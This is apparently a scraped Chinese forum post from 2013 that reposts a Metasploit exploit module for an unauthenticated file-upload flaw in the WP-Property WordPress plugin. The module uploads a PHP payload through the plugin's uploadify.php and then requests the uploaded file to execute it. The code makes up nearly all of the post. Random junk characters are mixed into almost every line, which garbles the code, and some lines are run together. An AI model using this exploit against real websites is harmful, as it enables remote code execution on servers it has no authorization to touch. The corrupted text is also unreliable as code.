WordPress WP-Property PHP 文件上传漏洞% o) M; J) i5 _/ \: A& o! d5 w
: H& {) f" _2 \9 h
## # This file is part of the Metasploit Framework and may be subject to
/ \& w9 I3 K$ c8 a; J# P1 Z# [
( s6 b8 u& H0 T$ Q# redistribution and commercial restrictions. Please see the Metasploit
( A9 _: m0 c1 h: x: E# K/ D1 p
& A" r$ ~% r2 R3 y% X. P: Z# Framework web site for more information on licensing and terms of use.
7 R. ^/ K0 s' o" z+ |# v0 g
& N. J5 w j! I$ Q; ~" O/ h1 B# http://metasploit.com/framework/ ##9 P* ]3 q& p/ z& @! M2 [ v5 ^
8 H9 K) b: `: L( ]/ H
! n, w& {+ S8 T. X
$ Z: z A# m! D4 \
; p$ X- Z9 V, y8 z3 e h6 D
+ u5 v `* c/ B
require 'msf/core'
3 x- [4 K# @5 k6 t" _require 'msf/core/exploit/php_exe'
: r( Z+ B) E4 B F' o, s- F3 ]- [0 j9 F9 ]2 ]; S
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',+ l6 y( g% l, b' a
'Description' => %q{
( U1 @6 n3 k- x5 XThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
) N# ~) h( i& L F[
( I- g4 Y5 b, {# d1 \'Sammy FORGIT', # initial discovery
9 [ q1 V# Y- ]: H4 E g'James Fitts <fitts.james[at]gmail.com>' # metasploit module
' I9 U& e( R. }/ u1 y],- D7 @1 R9 I7 ]' Z$ C9 U
'License' => MSF_LICENSE,) N; m2 R. p" w# M6 i
'References' =>
V) n: r* f4 w+ V+ s1 i[
9 `3 |- e! ]$ d+ |' B/ ~7 S[ 'OSVDB', '82656' ],
% w9 H ~, ^& W6 f9 n" k9 S[ 'BID', '53787' ],
?! _! f4 d Q( |1 |( H[ 'EDB', '18987'],; w; Q& X9 N+ e0 r, x
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
0 [8 @1 s4 x) R& h. L; o. e" E/ V],& n' h: ?' g8 S
'Payload' =>
9 {( o. z: c6 V/ W( N1 L% J{
- O* w9 c+ j1 }% B n( L'BadChars' => "\x00",
/ W# \2 j3 u2 y# R% w},
H8 ~- J8 j: s8 E'Platform' => 'php',; n+ L+ B. y& N' Y: S, o
'Arch' => ARCH_PHP,: u# M6 l, n" U7 f( H
'Targets' =>
- p: o2 c$ _ M1 C; Z4 n[6 b, n, w( W0 v y9 U! a2 u
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
0 y D3 M4 c! A[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]; k0 _" u& K: ]
],
. w; L% `9 [/ U' ]'DefaultTarget' => 0,
4 y9 v/ ^- G/ f8 w |0 ?9 M9 y+ m'DisclosureDate' => 'Mar 26 2012'))7 J" e3 V) m9 m5 A R
9 o P! }% a- V5 c) s# ^0 y6 }# Oregister_options(0 ^: D2 h' Z. e5 o* ]0 q x4 @
[) y+ E3 Z! L' j" J+ j; g0 x
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
& \ H6 }0 m* t% {2 T/ l], self.class), W0 W8 L/ i3 y
end6 i m( G1 b1 _6 a
$ V( U: o, u! F' Hdef check& s1 k/ u; H+ N# F7 K% r( @# F
uri = target_uri.path
) J. J) i) a" \% duri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',7 n3 P& l# u5 B+ P! P: e9 y* ]1 `
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"+ Z* i: }; i$ E. Y& t
})
7 R' |6 L7 F$ ]& _$ b3 U) B" ^* g& A9 g, o' w
if not res or res.code != 200, ~' Y) V! t3 H
return Exploit::CheckCode::Unknown
, T1 T5 H( W9 W& g. Qend/ H1 l0 ^# P% |* Y9 E! j
2 ?7 A; i! U& N( H# G; H
return Exploit::CheckCode::Appears( ~, H" `; V n0 R; n
end
2 |+ j. J; X$ f. R3 z0 \: C# O" n/ j
def exploit; ?& c3 Y8 t% U+ \5 |& e( x
uri = target_uri.path4 A9 E- j4 t. Z1 n) `. x
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
! u+ V) T' ~0 v
0 T0 e4 d1 O' B- odata = Rex::MIME::Message.new
/ d; L$ l: ~. J0 \" hdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
5 r4 `7 u& x6 R jdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
" n; M% R) {! g" [post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')6 ?. v! N( k! z
) A$ C5 Q5 ?1 w; A0 g/ Eprint_status("#{peer} - Uploading payload #{@payload_name}")8 n3 I) z. c( q
res = send_request_cgi({
( C, W6 W; _2 d) l* A" X0 Z" K'method' => 'POST',$ h4 x3 o5 x; {& }# `7 c
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",( F3 S( k5 X& F1 }- \
'ctype' => "multipart/form-data; boundary=#{data.bound}",
, j3 p9 ?" d c% L1 }" x'data' => post_data
( w/ `% i: c6 E5 l# k/ ]9 ~}), v: x+ [7 T2 D, `. M6 C
" K; ?2 v9 W4 m) Q/ @
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
% O' x2 r! ?" M$ w% l9 [fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+ @6 K) F+ F+ y+ T* L# O& nend& j4 O2 \. g: d
0 j' L! }9 O) C; ]$ ^upload_uri = res.body
( M( T$ ?. p& a/ Z6 l6 m1 v$ S+ F6 u& m1 l! d$ N
print_status("#{peer} - Executing payload #{@payload_name}"). E$ k/ S/ j% ^) f$ l$ S* T
res = send_request_raw({
" r# Y& X7 j+ P: y g; \! l n'uri' => upload_uri,
/ ~, p+ J; }+ e5 a# H'method' => 'GET'& ~9 k5 u g( X, Q' X( H% b9 E; W0 w
})2 I6 m7 ?3 e( K. v" j& K I
end2 } G6 k# _) [+ Y" t; M/ [
end% T% N8 u+ I8 u( b: J
+ c8 m/ g3 P3 C7 }5 G* D
不要问我这写的是什么 怎么利用 我是说msf.0 _- w4 I7 M8 ^
: V% l, n9 c+ L, N) @5 r/ U: O4 l |
发表于 2013-1-4 19:51:30
收藏
支持
反对